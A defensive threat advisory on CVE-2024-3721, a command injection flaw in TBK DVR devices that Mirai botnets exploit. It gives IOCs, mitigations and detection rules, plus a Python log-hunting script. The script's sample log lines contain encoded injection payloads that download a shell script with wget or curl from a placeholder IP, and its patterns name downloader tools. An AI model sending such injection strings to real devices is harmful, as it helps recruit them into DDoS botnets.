CVE-2024-3721 TBK DVR Command Injection
Targeted Sectors
· Critical infrastructure
· Maritime logistics
· General consumers using unpatched IoT/DVR devices
Targeted Countries
· Global
· High concentration on internet-exposed IoT devices.
BLUF
· An existing public PoC for a command injection flaw in TBK DVR devices continues to be actively weaponized by Mirai botnets to recruit vulnerable IoT devices for DDoS campaigns.
Date of First Reported Activity (Exploitation/PoC)
· April 2024 (PoC released).
Date of Last Reported Activity Update
· December 8, 2025
· ongoing botnet activity reported
APT Names
· This does not appear to be state-sponsored activity
Associated Criminal Organization Names
· Associated with various general Mirai botnet operators
o e.g., the "Broadside" variant and the "ShadowV2" botnet
CVEs and CVSS Vectors:
CVE-2024-3721
Improper Neutralization of Special Elements used in an OS Command (CWE-78).
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
· Base score: 6.3 (Medium)
Tenable ID
· There is no specific plugin for this CVE
Is this on the KEV List?
· No
Mitigation and Guidance
Since an official patch from the manufacturer is unavailable, the primary guidance involves network segmentation and device management.
· Isolate devices
o Immediately isolate the affected TBK DVRs from untrusted networks.
· Disable remote access
o Disable remote access to the device if it is not strictly necessary.
· Monitor activity
o Monitor for any suspicious network activity or unauthorized command executions on the device.
· Use third-party protection
o Network security vendors such as Fortinet and Check Point have released intrusion prevention system (IPS) protections to detect and block exploitation attempts.
IOCs
· Connections to/from known C2 servers (e.g., specific IPs mentioned in various threat intel feeds).
· File hashes of associated malware payloads (e.g., 87792cf4bd370f483a293a23c4247c50, specific ARM32 binaries).
TTPs
· T1190 Exploit Public-Facing Application: Crafted POST requests to DVR web interfaces.
· T1059.004 Command and Scripting Interpreter: Injecting shell commands into parameters (mdb, mdc).
· T1105 Ingress Tool Transfer: Downloading ARM-based Mirai payloads.
Malware Names
· Mirai
· Broadside
· ShadowV2
Malware Sample
As a reminder, hashes tend to be dynamic and unique to each campaign. The heuristic behavior is more notable.
Mirai
sha256
1fa305b5646b159d7af886c8bffb8da00076f9487991c2ceec382fd7c81cc208
URL to example
hxxps://bazaar.abuse.ch/sample/1fa305b5646b159d7af886c8bffb8da00076f9487991c2ceec382fd7c81cc208/
BroadSide
sha256
11c0447f524d0fcb3be2cd0fbd23eb2cc2045f374b70c9c029708a9f2f4a4114
URL to example
hxxps://www.virustotal.com/gui/file/11c0447f524d0fcb3be2cd0fbd23eb2cc2045f374b70c9c029708a9f2f4a4114
ShadowV2
sha256
db4b8c14162d4ec6e8ebbdfc0e024358cb5726c236953a875ff868154035de33
URL to example
hxxps://www.virustotal.com/gui/file/db4b8c14162d4ec6e8ebbdfc0e024358cb5726c236953a875ff868154035de33
Delivery Method
Automated web scanning and exploitation of unpatched, internet-exposed DVR devices.
Email Samples: Not applicable; automated network exploitation
Suggested Rules / potential hunts
· As a reminder, these are indicator rules and are likely to be noisy.
Suggested Suricata Rules
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET INFO TBK DVR CVE-2024-3721 Command Injection Attempt"; flow:established,to_server; content:"POST"; http_method; content:"/device.rsp"; http_uri; nocase; pcre:"/mdb=|mdc=/P"; reference:url,bleepingcomputer.com; classtype:attempted-admin; sid:XXXXXXX; rev:1;)
Suggested Sentinel Rules
Syslog | where DeviceVendor contains "TBK" | where Message contains "device.rsp" | where Message has_any ("wget", "curl", "sh", "system")
Potential Splunk Hunts
index=iot_logs uri_path="/device.rsp" | search "mdb=" OR "mdc=" | stats count by src_ip, uri_path, http_user_agent
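The three rules above encode the same two-tier idea: an indicator tier (any POST to /device.rsp carrying mdb= or mdc=) that is cheap but noisy, and a higher-confidence tier that only fires when the parameter values themselves carry shell metacharacters or an ingress-tool name. The Python below is an added example, not code from the advisory or from any vendor, that runs that logic over constructed log lines; the log format, the sample IPs (RFC 5737 test ranges) and the request bodies are all invented for the demonstration.

```python
"""Two-tier hunt for CVE-2024-3721-style requests over constructed web logs."""
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample lines (not from any real device or feed); the assumed format is
# "<timestamp> <src_ip> <method> <uri> <status> body=<raw POST body>"
SAMPLE_LOG = """\
2025-12-08T10:00:01Z 203.0.113.10 POST /device.rsp 200 body=mdb=sos&mdc=%3Bwget+http%3A%2F%2F203.0.113.10%2Fx.sh%3B
2025-12-08T10:00:02Z 203.0.113.10 POST /device.rsp 200 body=mdb=sos&mdc=%3Bcurl+http%3A%2F%2F203.0.113.10%2Fx.sh%3B
2025-12-08T10:00:03Z 198.51.100.7 GET /index.html 200 body=
2025-12-08T10:00:04Z 198.51.100.7 POST /device.rsp 200 body=mdb=sos&mdc=status
2025-12-08T10:00:05Z 192.0.2.44 POST /login.rsp 200 body=user=admin&mdc=x
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src_ip>\S+) (?P<method>[A-Z]+) (?P<uri>\S+) "
    r"(?P<status>\d{3}) body=(?P<body>.*)$"
)
INJECTION_PARAMS = ("mdb", "mdc")                    # parameters named in the advisory's TTPs
SHELL_META = re.compile(r"[;|&`$()]")                # metacharacters an OS command injection needs
DOWNLOADER = re.compile(r"\b(wget|curl|tftp|busybox)\b")  # T1105 ingress-tool hints


def parse_line(line):
    """Return the record as a dict, or None when the line does not fit the assumed format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def indicator_match(rec):
    """Indicator tier, same logic as the Suricata/Splunk rules: POST to /device.rsp with mdb= or mdc=."""
    uri_path = rec["uri"].split("?", 1)[0]
    return (
        rec["method"] == "POST"
        and uri_path == "/device.rsp"
        and any(p + "=" in rec["body"] for p in INJECTION_PARAMS)
    )


def injection_reasons(rec):
    """High-confidence tier: URL-decode the body and inspect only the mdb/mdc values."""
    reasons = []
    params = parse_qs(rec["body"], keep_blank_values=True)
    for name in INJECTION_PARAMS:
        for value in params.get(name, []):
            if SHELL_META.search(value):
                reasons.append(f"{name}: shell metacharacter")
            for tool in DOWNLOADER.findall(value):
                reasons.append(f"{name}: downloader {tool}")
    return reasons


def hunt(log_text):
    """Count indicator hits per source IP (the Splunk stats) and list high-confidence records."""
    indicator_hits = Counter()
    high_confidence = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not indicator_match(rec):
            continue
        indicator_hits[rec["src_ip"]] += 1
        reasons = injection_reasons(rec)
        if reasons:
            high_confidence.append((rec["src_ip"], reasons))
    return {"indicator_hits": indicator_hits, "high_confidence": high_confidence}


if __name__ == "__main__":
    result = hunt(SAMPLE_LOG)
    for ip, n in result["indicator_hits"].most_common():
        print(f"{ip}: {n} indicator hit(s)")
    for ip, reasons in result["high_confidence"]:
        print(f"HIGH {ip}: {', '.join(reasons)}")
```

On the constructed input, 203.0.113.10 produces two indicator hits that both escalate to the high-confidence tier, 198.51.100.7 produces one indicator hit that does not escalate (a plain mdc=status value, which is the kind of noise the reminder above warns about), and the POST to /login.rsp is ignored because the path check mirrors the rule's /device.rsp anchor. Decoding the body before inspecting it matters: percent-encoded semicolons and plus-encoded spaces would otherwise hide the metacharacters from a raw substring match.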
References
Fortinet
· hxxps://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
Securelist
· hxxps://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/
Cydome
· hxxps://cydome.io/cydome-identifies-broadside-a-new-mirai-botnet-variant-targeting-maritime-iot/
FortiGuard Labs
· hxxps://fortiguard.fortinet.com/outbreak-alert/tbk-dvrs-botnet-attack
Security Affairs
· hxxps://securityaffairs.com/178779/malware/new-mirai-botnet-targets-tbk-dvrs-by-exploiting-cve-2024-3721.html
SOC Radar
· hxxps://socradar.io/labs/app/cve-radar/CVE-2024-3721
NVD
· hxxps://nvd.nist.gov/vuln/detail/CVE-2024-3721
TrendMicro
· hxxps://www.trendmicro.com/en_us/research/25/j/rondodox.html
RedHat Customer Portal
· hxxps://access.redhat.com/security/cve/cve-2024-3721
Malware Bazaar
· hxxps://bazaar.abuse.ch/sample/1fa305b5646b159d7af886c8bffb8da00076f9487991c2ceec382fd7c81cc208/
VirusTotal
· hxxps://www.virustotal.com/gui/file/11c0447f524d0fcb3be2cd0fbd23eb2cc2045f374b70c9c029708a9f2f4a4114
· hxxps://www.virustotal.com/gui/file/db4b8c14162d4ec6e8ebbdfc0e024358cb5726c236953a875ff868154035de33